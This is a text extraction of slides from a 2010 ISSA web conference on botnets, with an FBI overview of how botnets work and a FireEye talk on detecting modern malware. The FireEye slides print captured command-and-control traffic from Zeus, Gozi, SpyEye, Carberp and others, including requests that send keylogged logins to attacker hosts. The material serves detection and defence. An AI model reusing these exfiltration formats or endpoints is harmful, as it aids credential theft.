MASTER_October.web Conference PPT

8/6/2019 MASTER_October.web Conference PPT

1/44

Botnets

ISSA Web ConferenceOctober 26, 2010

Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London

1

Sponsored by:


2/44

Welcome: Conference Moderator

2

Phillip H Griffin

Member - ISSA Educational Advisory Council, Web Conferences

Committee


3/44

Agenda

How Botnets Have Evolved

Chris Calderon - Special Agent, FBI

Rooting Out the Bad Actors Alex Lanstein - Systems Consulting Engineer, FireEye

Joint Speaker Question & Answer

Closing Comments

3


4/44

How Botnets HaveEvolved

presented by

Special Agent Chris Calderon

FBI

UNCLASSIFIED

UNCLASSIFIED


5/44

Agenda

What is a botnet?

How are botnets created?

Why are botnets created?

Basic structure of a botnet

Taking down a botnet

How botnets are evolving

Botnets in the news

Questions

UNCLASSIFIED

UNCLASSIFIED


6/44

What is a botnet?

A network of compromised computers

(robots/bots)

Controlled by a bot master / herder

Used to carry out various illegal activities

Services are often sold to other criminal

elements

UNCLASSIFIED

UNCLASSIFIED


7/44

How are botnets created?

Setup

Obtain reliable infrastructure

Develop malware and C&C software

Victims

Malware loaded onto victim machines

Done through exploits and/or social engineering

Manage Continually update software / instructions to bots Maintain statistics for the botnet

UNCLASSIFIED

UNCLASSIFIED


8/44

Why are botnets created?

Spam

Distributed Denial of Service (DDoS)

Click Fraud Fake Anti-Virus

Credential Theft

Proxy Service Cyber Warfare

UNCLASSIFIED

UNCLASSIFIED


9/44

Basic Structure

Bot Master /Herder

C&C

Server

Victim

Victim

C&C

ServerVictim

UNCLASSIFIED

UNCLASSIFIED


10/44

Taking down a botnet

Bot Master /Herder

C&C

Server

Victim

Victim

C&C

ServerVictim

UNCLASSIFIED

UNCLASSIFIED


11/44

Botnets evolving

Bot Master /Herder

C&C

Server

Proxy Victim

Proxy

Victim

Victim

C&C

ServerProxy Victim

UNCLASSIFIED

UNCLASSIFIED


12/44

Botnets evolving

Bot Master /Herder

ProxyC&C

Server

Proxy Victim

Proxy

Victim

Victim

ProxyC&C

ServerProxy Victim

UNCLASSIFIED

UNCLASSIFIED


13/44

Botnets in the news

ZEUS

Steels and logs online banking credentials

Primarily targets high balance accounts

Money mules used to get money to bad

actors

Kit now used by many different groups

Estimated $70,000,000 stolen from US banks

UNCLASSIFIED

UNCLASSIFIED


14/44

Botnets in the news

MARIPOSA (BUTTERFLY)

Steels online credentials, and also used in

DDoS attacks

Estimated 12 million infected computers

Bad actors traced to Spain and arrested

Criminal proceedings ongoing

UNCLASSIFIED

UNCLASSIFIED


15/44

Botnets in the news

SPAM BOTS

Conficker, Cutwail, Waledac, .

Up to 10 million bots per botnet

Each botnet can send billions of spam emails

per day

Spam used to distribute malware, drive

online pharmaceutical sales, fake antivirussoftware, pay per click advertising, .

UNCLASSIFIED

UNCLASSIFIED

UNCLASSIFIED


16/44

Questions?

UNCLASSIFIED

UNCLASSIFIED


17/44

Rooting out the Bad Actorsor: p2p, fast flux, and other botnet myths

Alex LansteinSenior Security Researcher

FireEye, Inc.


18/44

Todays Agenda

Understanding the shift fromconventional to modern malware, andthe resultant hosting needs

A few TT&P to uncover older ormoderately sophisticated malware

A detailed looked a few bots in thenews

18

2


19/44

Conventional vs. Modern, APT Malware

Conventional Malware

Characterized by using spreading techniques, customC&C transport protocols, IRC communication

Examples: Malware/worms such as Conficker, Blaster,Slammer, Mega-D, IRC bots

Detectable through a variety of technologies/tactics:

NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS

Port scanning, high windows port activity, non-http overport 80, non-web traffic, etc.

19

3


20/44

Conventional vs. Modern Malware

Modern-ish malware: Characterized by infecting via browser based exploits

Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C

Callback over HTTP(s) Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye

Partially detectable through manual traffic analysis fairlyeasily, but a full time resource is needed

20

4


21/44

Worlds Top Malware

Source: FireEye Malware Intelligence Lab

21

21


22/44

Modern Malware Infection Lifecycle

22

Desktop antivirusLosing the threat arms race

CompromisedWeb server, orWeb 2.0 site

Callback Server

Perimeter Security

Signature, rule-based

Other gatewayList-based, signatures

System gets exploited

Drive-by attacks in casual browsing

Links in Targeted Emails

Socially engineered binaries

Dropper malware installs

First step to establish control

Calls back out to criminal servers

Found on compromised sites, andWeb 2.0, user-created content sites

Malicious data theft & long-term control established

Uploads data stolen via keyloggers,

Trojans, bots, & file grabbersOne exploit leads to dozens of

infections on same system

Criminals have built long-termcontrol mechanisms into system

3

2

1

22


23/44

Where is all this malware being hosted?

Previously we used to see malware being hosted oninfected home machines

Web filters responded by blocking access to domains

that had multiple A records in residential IP space

Now its being hosted on dedicated servers in proper

data centers. Sometimes even with their own RIRregistered IP space!

23


24/44

Root of the Problem

There is no Internet Police!

Who controls the Internet? ICANN? IANA? CERTs?USCYBERCOM? Tier 1 ISPs?

Depends who you ask and how big a stink you make.

24


25/44

How the Internet is delegated

In the name space (think DNS):

ICANN Registries

Registries == Verisign, Affilias, ccTLD operators Registries sell to certified gTLD and regional registrars

Registrars == namecheap.com, godaddy.com,netsol.com

Registrars sell to registrants (end user)

25


26/44

How the Internet is delegated

In the IP space:

ICANN/IANA (Internet Assigned Numbers Authority)

IANA

RIRs RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC

RIRs LIRs

LIRs are generally data centers and ISPs

26


27/44

27


28/44

28


29/44

29


30/44

ICANNt do anything!

ICANN and the RIRs simply sign contracts. They haveno regulatory authority whatsoever, presuming that theRegistrar doesnt violate the contract. These contractshave no mention of content.

Recent success against EstDomains was due to themhaving a convicted felon as an Officer of the company.

Large pushback when someone even suspects theyare trying to take an authoritative stance on something.

30


31/44

31


32/44

32


33/44

Big bots in 2010


34/44

Rustock still sticking around

POST /index.php?topic=33.117 HTTP/1.1

Accept: */*Accept-Language: en-usReferer: http://go-thailand-now.com/Content-Type: application/x-www-form-urlencodedContent-Encoding: gzip

UA-CPU: x86Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1)Host: go-thailand-now.com

Content-Length: 214Connection: Keep-AliveCache-Control: no-cache

18

34


35/44

Gozi

35

19

POST /cgi-bin/forms.cgi HTTP/1.0Content-Type: multipart/form-data; boundary=--------------------------139b9b3139b9b3139b9b3User-Agent: IEHost: 91.216.215.130Content-Length: 453

Pragma: no-cache

----------------------------139b9b3139b9b3139b9b3Content-Disposition: form-data; name="upload_file"; filename="3759777034.21"Content-Type: application/octet-stream

URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove----------------------------139b9b3139b9b3139b9b3--


36/44

Zeus

POST /xed/gate.php HTTP/1.1

Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;

WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)

Host: schastlivieiveselierebyta0001.com

Content-Length: 329Connection: Keep-Alive

Cache-Control: no-cache

. ....4...A..2.`.Ul...T.......(....4pP.u.x.!.D.!.+.......q..'7.........7.....D.0..Y...$.......[(...F...c.|e.y...g.b..t.x.......-

[email protected]>.s..j=.

..rY?.-8.c Ss.Gt'.a. ...cU./. .e(....QB.D.S..N0>.5.....I. :........".....;5..U.

.t....!......f.=E.


37/44

Tigger Not just financials anymore

POST /track_c.cgi HTTP/1.0Content-Length: 81icin.wembh.rjr...{|.JST]....wSJAUQFN.mST^AJS.bj.i_HUUY_.j[YQ. .J.J.. ...L .

SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack

3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login

Title: Process: C:\Program Files\Internet Explorer\iexplore.exeUser-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts;.NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]]{{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timezoneOct=420&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true&awcharset=UTF-8&KEYLOG=s}}}21

37
https://internal.fireeye.com/loginhttps://internal.fireeye.com/login


38/44

SpyEye ZeuS replacement?

GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232&ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKLAF24&md5=9012ab902413dcf8gga89 HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: hahsdhsl.comPragma: no-cache

GET /maincp/gate.php?guid=user2!ND93103!893CND1&ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889712214bdbee8381337 HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.promohru.inPragma: no-cache

22

38


39/44

Carberp Yet Another Datastealer

POST /recv.php HTTP/1.1

Host: 194.54.80.146User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10Accept: text/htmlConnection: CloseContent-Type: application/x-www-form-urlencodedContent-Length: 331

uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1&data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom%2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7

CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww%2Estarwoodhotels%2Ecom%252Fpreferredguest%252Findex%2Ehtml%26login%3DALEXLANSTEIN%2540GMAIL%2ECOM%26persist%3Dtrue%26password%3Dmypassword

23

39


40/44

TDSS Full on SSL

19:11:56.590979 IP 194.28.113.21.443 > 192.168.2.44.54528:tcp 620....E [email protected][z7l.:........................J...F..L...N.]...xmvF..(..l...?},,nc{..ygs.R...._........8.a#9cU....I..5................0...0..j. ...yV.9.x0 . *.H.......0E1.0 ..U....AU1.0...USome-State1!0...U...Internet WidgitsPty Ltd0.. 100114192303Z. 110114192303Z0E1.0.U....AU1.0...USome-State1!0...U...Internet Widgits Pty Ltd0..0. *.H.. .........0.......|[email protected]

....]P.*.....W.C...N5.(...Ux.z.._....W...b....*.P....AX.....(.......E.....0 .*.H.. [email protected].$K)..EF;....u.X......r.l.\......[.r.0@......%....S`...p....

.=3;[email protected]^7......"Zw..5.)g..........

24

40


41/44

41

FireEye, Inc. Confidential 41

www.fireeye.comFor late-breaking malware research and news:

blog.fireeye.com

Thank you!

Alex [email protected]
http://www.fireeye.com/mailto:[email protected]:[email protected]://www.fireeye.com/


42/44

Joint Speaker Question & Answer

Chris Calderon Special Agent, FBI

Alex Lanstein

Systems Consulting Engineer, FireEye

42


43/44

43

Closing Remarks

Online Meetings Made Easy

Thank you to Citrix for donating this Webcast service

Thank you to FireEye for their support of ISSA and this Web Conference


44/44

CPE Credit

Within 24 hours of the conclusion of this webcast,you will receive a link to a post Web Conferencequiz.

After the successful completion of the quiz you willbe given an opportunity to PRINT a certificate ofattendance to use for the submission of CPEcredits.

44

Documents

MASTER_October.web Conference PPT